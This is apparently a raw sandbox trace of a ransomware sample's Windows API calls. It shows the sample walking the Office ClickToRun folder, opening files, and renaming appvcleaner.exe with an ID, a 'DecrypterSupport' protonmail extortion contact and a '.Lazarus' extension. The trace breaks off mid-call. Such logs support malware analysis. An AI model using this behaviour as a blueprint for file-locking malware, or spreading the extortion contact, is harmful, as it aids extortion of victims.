RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0075.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x69bb0 [0075.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0075.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x5a6b8 [0075.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0075.714] AreFileApisANSI () returned 1 [0075.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0075.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85ee0 [0075.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 74 [0075.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5a6b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 136 [0075.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x110) returned 0x8c288 [0075.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5a6b8, cbMultiByte=-1, lpWideCharStr=0x8c288, cchWideChar=136 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 136 [0075.714] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92460 | out: hHeap=0x20000) returned 1 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0075.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.715] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a330a6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a330a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x4b0d8, dwReserved0=0xcdd5d038, dwReserved1=0xb6b3bfa4, cFileName="AppVFileSystemMetadata.dll", cAlternateFileName="APPVFI~1.DLL")) returned 1 [0075.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0075.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0075.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0075.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0075.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0075.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0075.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0075.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0075.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0075.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0075.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0075.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0075.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0075.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0075.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0075.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0075.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0075.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0075.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0075.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0075.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81cb0 [0075.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0075.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0075.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0075.716] AreFileApisANSI () returned 1 [0075.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll", lpUsedDefaultChar=0x0) returned 85 [0075.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0075.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0075.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0075.717] AreFileApisANSI () returned 1 [0075.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0075.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x812a0 [0075.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x812a0, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 85 [0075.717] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0075.717] GetFileType (hFile=0x430) returned 0x1 [0075.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0075.717] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0075.717] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0075.717] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0075.718] CloseHandle (hObject=0x430) returned 1 [0075.718] AreFileApisANSI () returned 1 [0075.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0075.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x819d0 [0075.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x819d0, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 85 [0075.718] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.718] GetLastError () returned 0x20 [0075.718] GetLastError () returned 0x20 [0075.718] SetLastError (dwErrCode=0x20) [0075.718] GetLastError () returned 0x20 [0075.718] SetLastError (dwErrCode=0x20) [0075.718] GetLastError () returned 0x20 [0075.718] SetLastError (dwErrCode=0x20) [0075.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x819d0 | out: hHeap=0x20000) returned 1 [0075.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0075.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0075.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0075.718] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.719] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.719] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a330a6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a330a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x2052d8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppVIntegration.dll", cAlternateFileName="APPVIN~1.DLL")) returned 1 [0075.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0075.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0075.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0075.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0075.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0075.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0075.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0075.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0075.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0075.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0075.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0075.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0075.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0075.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0075.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0075.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0075.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0075.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0075.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0075.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0075.719] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.719] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.719] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.719] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0075.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0075.719] AreFileApisANSI () returned 1 [0075.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll", lpUsedDefaultChar=0x0) returned 78 [0075.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0075.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0075.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0075.720] AreFileApisANSI () returned 1 [0075.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0075.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0075.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 78 [0075.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0075.720] GetFileType (hFile=0x430) returned 0x1 [0075.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0075.720] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0075.720] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0075.721] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0075.721] CloseHandle (hObject=0x430) returned 1 [0075.721] AreFileApisANSI () returned 1 [0075.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0075.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0075.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 78 [0075.721] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.721] GetLastError () returned 0x20 [0075.721] GetLastError () returned 0x20 [0075.721] SetLastError (dwErrCode=0x20) [0075.721] GetLastError () returned 0x20 [0075.721] SetLastError (dwErrCode=0x20) [0075.721] GetLastError () returned 0x20 [0075.721] SetLastError (dwErrCode=0x20) [0075.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0075.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0075.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0075.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0075.722] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.722] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.722] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a59305, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a59305, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x726d8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppVIsvApi.dll", cAlternateFileName="APPVIS~1.DLL")) returned 1 [0075.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0075.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0075.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0075.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0075.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0075.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0075.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0075.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0075.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0075.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0075.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0075.722] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.722] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.722] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.722] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0075.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.722] AreFileApisANSI () returned 1 [0075.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program 